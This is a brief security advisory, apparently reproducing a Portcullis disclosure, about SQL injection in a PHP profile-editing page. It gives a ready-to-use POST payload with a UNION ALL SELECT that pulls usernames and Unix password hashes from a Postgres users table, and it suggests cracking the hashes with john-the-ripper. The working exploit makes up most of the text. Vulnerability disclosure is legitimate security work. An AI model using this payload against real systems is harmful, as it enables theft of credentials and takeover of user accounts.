Original Advisory: portcullis-security.com/179.php
The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points.
The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database.
The hashes can then be cracked using john-the-ripper.
Exploit:-
POST request to:/www/people/editprofile.php
skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+
from+users--%3d1&MultiDelete=Delete
works against postgres database :).
Refer to the paper for exploiting sql injections against postgres database.